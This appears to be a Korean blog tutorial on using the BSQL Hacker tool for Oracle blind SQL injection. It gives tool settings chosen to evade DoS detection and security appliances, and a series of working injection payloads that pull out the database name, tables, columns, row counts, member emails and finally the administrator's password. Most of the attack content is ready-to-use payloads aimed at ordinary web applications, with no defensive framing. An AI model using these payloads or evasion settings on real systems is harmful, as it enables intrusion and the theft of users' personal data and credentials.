본문 바로가기
30./34. SQL Injection

[BSQL Hacker] Oracle Blind Injection

oneandonlyme 2013. 11. 20. 11:16

BSQL Hacker

Download URL : http://labs.portcullis.co.uk/tools/bsql-hacker/




처음 실행 화면







Thread 개수 설정 (DOS공격 탐지나 보안장비 차단을 피하기 위해 낮게 설정)


공격 타임 (Request Delay 단위 ms) - 5000ms = 5초

5초에 1번 공격





중간 탭(Dashboard, Detection, Request & Injection, Settings, Extracted Databases)  중 Detection 확인


Blind Injection 의 경우 참과 거짓으로 판단하기 때문에

Signature / Search Based로 설정






Post / Get 방식, Cookies, HTTP Headers 설정, 가능

로그인 후 공격 방식일 경우 Cookies 값을 입력





웹 프로시를 사용할 경우 설정 가능

현재 Burp Suite를 사용하여 전송 패킷 값 




Templates > Templates - ORACLE - Blind SQL Injection 선택





http://www.example.com/example.php?id=100 AND NVL(ASCII(SUBSTR(({INJECTION}),{POSITION},1)),0){OPERATION}{CHAR}--




 설명

 공격방법 

 공격 주소 URL

 http://www.example.com/example.php

 파라미터

 ?

 연산자

 id=100

 SQL 쿼리문

 AND

 

 NVL(ASCII(SUBSTR(({INJECTION}),{POSITION},1)),0)

 

 {OPERATION}

 

 {CHAR}

 주석

 --





{INJECTION} 의 경우 Oracle SQL Injection Cheet Sheet 에서 확인 가능

http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet



#################데이타베이스#################

AND NVL(ASCII(SUBSTR(({INJECTION}),{POSITION},1)),0){OPERATION}{CHAR}--

AND NVL(ASCII(SUBSTR((SELECT global_name FROM global_name),{POSITION},1)),0){OPERATION}{CHAR}--


 

################# 테이블 #################

AND NVL(ASCII(SUBSTR((select Table_name from (select rownum rnum, Table_name from user_tables) where rnum=1),{POSITION},1)),0){OPERATION} {CHAR} --



################# 특정 테이블 #################

AND NVL(ASCII(SUBSTR((select Table_name from (select rownum rnum, Table_name from user_tables where table_name like '%MEMBER%') where rnum=1),{POSITION},1)),0){OPERATION} {CHAR} --

=> MEMBER 라는 문자열이 들어가는 테이블 추출



################# 컬럼 추출 #################

AND NVL(ASCII(SUBSTR((select column_name from (select rownum rnum, column_name from user_tab_columns where table_name = 'MEMBER') where rnum=1),{POSITION},1)),0){OPERATION} {CHAR} --


################# 데이타 개수 #################

AND NVL(ASCII(SUBSTR((select count(ID) from MEMBER),{POSITION},1)),0){OPERATION}{CHAR}--


################# 데이타 추출 #################

AND NVL(ASCII(SUBSTR((select MBR_ID||'|'||BIRTH_DT||'|'||HP_NO||'|'||MBR_NAME||'|'||MBR_EMAIL||'|'||MBR_PWD||'|'||MBR_PWD from (select rownum rnum, MBR_ID,BIRTH_DT,HP_NO,MBR_NAME,MBR_EMAIL,MBR_PWD,MBR_PWD from MEMBER) where rnum=1),{POSITION},1)),0){OPERATION}{CHAR}--

=> 실패


and NVL(ASCII(substr((select MBR_EMAIL from (select rownum as num, MBR_EMAIL from MEMBER) where num=1),{POSITION},1)),0){OPERATION}{CHAR}--

=> MEMBER 테이블에서 MER_EMAIL추출 1번째꺼

and NVL(ASCII(substr((select MBR_EMAIL from (select rownum as num, MBR_EMAIL from MEMBER where MBR_EMAIL like '%admin%') where num=1),{POSITION},1)),0){OPERATION}{CHAR}--
=> MEBER 테이블에서 admin문자열이 들어가는 EMAIL 추출



and NVL(ASCII(substr((select MBR_PWD from (select rownum as num, MBR_PWD from MEMBER where MBR_EMAIL like '%admin%') where num=1),{POSITION},1)),0){OPERATION}{CHAR}--

=> PASSWORD 추출


저작자표시

티스토리툴바